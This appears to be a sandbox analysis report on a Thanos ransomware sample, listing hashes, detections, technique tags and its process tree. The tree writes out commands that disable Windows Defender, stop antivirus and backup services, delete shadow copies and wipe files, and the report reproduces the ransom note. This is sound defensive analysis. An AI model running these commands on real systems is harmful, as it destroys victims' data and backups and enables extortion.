thanos | 2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
56s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Size

393KB
MD5

104b68a8b7e2913139049b30847f990f
SHA1

0f25791a039298be94a3d024f5a3d1796e13a587
SHA256

b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424
SHA512

cba38f93247621cc38ea33f72efc1147e0a6d1a8b9256a26853ac3c1c8c3c9444d2d3a5af586e934febad1822c93fbc1e9c538759b4587720ba03a92792ce04d

Score

10^/10

thanos evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral18/files/0x000200000001ab26-115.dat	disable_win_def
behavioral18/files/0x000200000001ab26-116.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
ransomware thanos

Thanos executable 2 IoCs

resource	yara_rule
behavioral18/files/0x000200000001ab26-115.dat	family_thanos_ransomware
behavioral18/files/0x000200000001ab26-116.dat	family_thanos_ransomware

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
4016	file.exe

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\DisableClose.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\DisableClose.tiff	file.exe
File created	C:\Users\Admin\Pictures\RenameRemove.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\RenameRemove.tiff	file.exe
File created	C:\Users\Admin\Pictures\StepGroup.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\StepGroup.tiff	file.exe
File created	C:\Users\Admin\Pictures\ConvertToUnregister.png.crypted	file.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	file.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	file.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2160	vssadmin.exe
2072	vssadmin.exe
1320	vssadmin.exe
4540	vssadmin.exe
4504	vssadmin.exe
4672	vssadmin.exe
4012	vssadmin.exe
4100	vssadmin.exe
2100	vssadmin.exe
1844	vssadmin.exe
1164	vssadmin.exe
4120	vssadmin.exe
4736	vssadmin.exe
4560	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4312	taskkill.exe
2356	taskkill.exe
4076	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4828	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	file.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1744	powershell.exe
Token: SeSecurityPrivilege	1744	powershell.exe
Token: SeTakeOwnershipPrivilege	1744	powershell.exe
Token: SeLoadDriverPrivilege	1744	powershell.exe
Token: SeSystemProfilePrivilege	1744	powershell.exe
Token: SeSystemtimePrivilege	1744	powershell.exe
Token: SeProfSingleProcessPrivilege	1744	powershell.exe
Token: SeIncBasePriorityPrivilege	1744	powershell.exe
Token: SeCreatePagefilePrivilege	1744	powershell.exe
Token: SeBackupPrivilege	1744	powershell.exe
Token: SeRestorePrivilege	1744	powershell.exe
Token: SeShutdownPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeSystemEnvironmentPrivilege	1744	powershell.exe
Token: SeRemoteShutdownPrivilege	1744	powershell.exe
Token: SeUndockPrivilege	1744	powershell.exe
Token: SeManageVolumePrivilege	1744	powershell.exe
Token: 33	1744	powershell.exe
Token: 34	1744	powershell.exe
Token: 35	1744	powershell.exe
Token: 36	1744	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	4124	Process not Found
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4392	Conhost.exe
Token: SeIncreaseQuotaPrivilege	1312	powershell.exe
Token: SeSecurityPrivilege	1312	powershell.exe
Token: SeTakeOwnershipPrivilege	1312	powershell.exe
Token: SeLoadDriverPrivilege	1312	powershell.exe
Token: SeSystemProfilePrivilege	1312	powershell.exe
Token: SeSystemtimePrivilege	1312	powershell.exe
Token: SeProfSingleProcessPrivilege	1312	powershell.exe
Token: SeIncBasePriorityPrivilege	1312	powershell.exe
Token: SeCreatePagefilePrivilege	1312	powershell.exe
Token: SeBackupPrivilege	1312	powershell.exe
Token: SeRestorePrivilege	1312	powershell.exe
Token: SeShutdownPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeSystemEnvironmentPrivilege	1312	powershell.exe
Token: SeRemoteShutdownPrivilege	1312	powershell.exe
Token: SeUndockPrivilege	1312	powershell.exe
Token: SeManageVolumePrivilege	1312	powershell.exe
Token: 33	1312	powershell.exe
Token: 34	1312	powershell.exe
Token: 35	1312	powershell.exe
Token: 36	1312	powershell.exe
Token: SeDebugPrivilege	4876	sc.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeIncreaseQuotaPrivilege	1524	powershell.exe
Token: SeSecurityPrivilege	1524	powershell.exe
Token: SeTakeOwnershipPrivilege	1524	powershell.exe
Token: SeLoadDriverPrivilege	1524	powershell.exe
Token: SeSystemProfilePrivilege	1524	powershell.exe
Token: SeSystemtimePrivilege	1524	powershell.exe
Token: SeProfSingleProcessPrivilege	1524	powershell.exe
Token: SeIncBasePriorityPrivilege	1524	powershell.exe
Token: SeCreatePagefilePrivilege	1524	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4016	file.exe
4016	file.exe
4016	file.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4016	file.exe
4016	file.exe
4016	file.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3260 wrote to memory of 4016	3260	b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe	71
PID 3260 wrote to memory of 4016	3260	b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe	71
PID 4016 wrote to memory of 1744	4016	file.exe	76
PID 4016 wrote to memory of 1744	4016	file.exe	76
PID 4016 wrote to memory of 1524	4016	file.exe	80
PID 4016 wrote to memory of 1524	4016	file.exe	80
PID 4016 wrote to memory of 1312	4016	file.exe	82
PID 4016 wrote to memory of 1312	4016	file.exe	82
PID 4016 wrote to memory of 3972	4016	file.exe	84
PID 4016 wrote to memory of 3972	4016	file.exe	84
PID 4016 wrote to memory of 1872	4016	file.exe	86
PID 4016 wrote to memory of 1872	4016	file.exe	86
PID 4016 wrote to memory of 2860	4016	file.exe	88
PID 4016 wrote to memory of 2860	4016	file.exe	88
PID 4016 wrote to memory of 4124	4016	file.exe	90
PID 4016 wrote to memory of 4124	4016	file.exe	90
PID 4016 wrote to memory of 4188	4016	file.exe	92
PID 4016 wrote to memory of 4188	4016	file.exe	92
PID 4016 wrote to memory of 4292	4016	file.exe	95
PID 4016 wrote to memory of 4292	4016	file.exe	95
PID 4016 wrote to memory of 4392	4016	file.exe	212
PID 4016 wrote to memory of 4392	4016	file.exe	212
PID 4016 wrote to memory of 4876	4016	file.exe	248
PID 4016 wrote to memory of 4876	4016	file.exe	248
PID 4016 wrote to memory of 4932	4016	file.exe	100
PID 4016 wrote to memory of 4932	4016	file.exe	100
PID 4016 wrote to memory of 4156	4016	file.exe	102
PID 4016 wrote to memory of 4156	4016	file.exe	102
PID 4016 wrote to memory of 2848	4016	file.exe	104
PID 4016 wrote to memory of 2848	4016	file.exe	104
PID 2848 wrote to memory of 4312	2848	net.exe	243
PID 2848 wrote to memory of 4312	2848	net.exe	243
PID 4016 wrote to memory of 2456	4016	file.exe	107
PID 4016 wrote to memory of 2456	4016	file.exe	107
PID 4016 wrote to memory of 2636	4016	file.exe	110
PID 4016 wrote to memory of 2636	4016	file.exe	110
PID 4016 wrote to memory of 1520	4016	file.exe	108
PID 4016 wrote to memory of 1520	4016	file.exe	108
PID 4016 wrote to memory of 3356	4016	file.exe	111
PID 4016 wrote to memory of 3356	4016	file.exe	111
PID 4016 wrote to memory of 4224	4016	file.exe	177
PID 4016 wrote to memory of 4224	4016	file.exe	177
PID 4016 wrote to memory of 4204	4016	file.exe	115
PID 4016 wrote to memory of 4204	4016	file.exe	115
PID 4016 wrote to memory of 3832	4016	file.exe	113
PID 4016 wrote to memory of 3832	4016	file.exe	113
PID 4016 wrote to memory of 4360	4016	file.exe	176
PID 4016 wrote to memory of 4360	4016	file.exe	176
PID 4016 wrote to memory of 3836	4016	file.exe	175
PID 4016 wrote to memory of 3836	4016	file.exe	175
PID 2456 wrote to memory of 184	2456	net.exe	256
PID 2456 wrote to memory of 184	2456	net.exe	256
PID 4016 wrote to memory of 668	4016	file.exe	120
PID 4016 wrote to memory of 668	4016	file.exe	120
PID 2636 wrote to memory of 188	2636	net.exe	207
PID 2636 wrote to memory of 188	2636	net.exe	207
PID 4016 wrote to memory of 3640	4016	file.exe	173
PID 4016 wrote to memory of 3640	4016	file.exe	173
PID 4016 wrote to memory of 1188	4016	file.exe	172
PID 4016 wrote to memory of 1188	4016	file.exe	172
PID 1520 wrote to memory of 496	1520	net.exe	171
PID 1520 wrote to memory of 496	1520	net.exe	171
PID 4016 wrote to memory of 4040	4016	file.exe	169
PID 4016 wrote to memory of 4040	4016	file.exe	169

C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "file.exe"
  2⤵
  - Executes dropped EXE
  - Modifies extensions of user files
  - Drops startup file
  - Modifies WinLogon
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:4156
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:4312
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:184
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:496
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:188
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:3676
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:3832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:4340
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:4252
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4492
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:4824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:2172
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:4192
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:4184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:4244
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:3844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:4332
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:4820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4168
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:3644
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:4104
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:5196
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:5004
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5412
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:5536
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:4960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5436
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5608
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:4256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:5600
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:2108
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:4040
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1188
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:3640
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:3836
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4360
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4224
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5836
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:5024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5844
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4316
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
    3⤵
    PID:2220
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4540
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4120
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4504
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4672
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4736
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1844
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1164
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4560
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4100
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4012
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2160
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2072
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1320
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2100
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4076
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4312
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:2356
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4896
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4280
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:2856
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:2416
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:3840
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4804
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4912
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
    3⤵
    PID:4564
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:4296
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:4828
  - - C:\Windows\system32\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      PID:4524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\file.exe
    3⤵
    PID:4104
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:4724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:4732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:3080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:2784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:4652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:4228

C:\Windows\system32\net1.exe
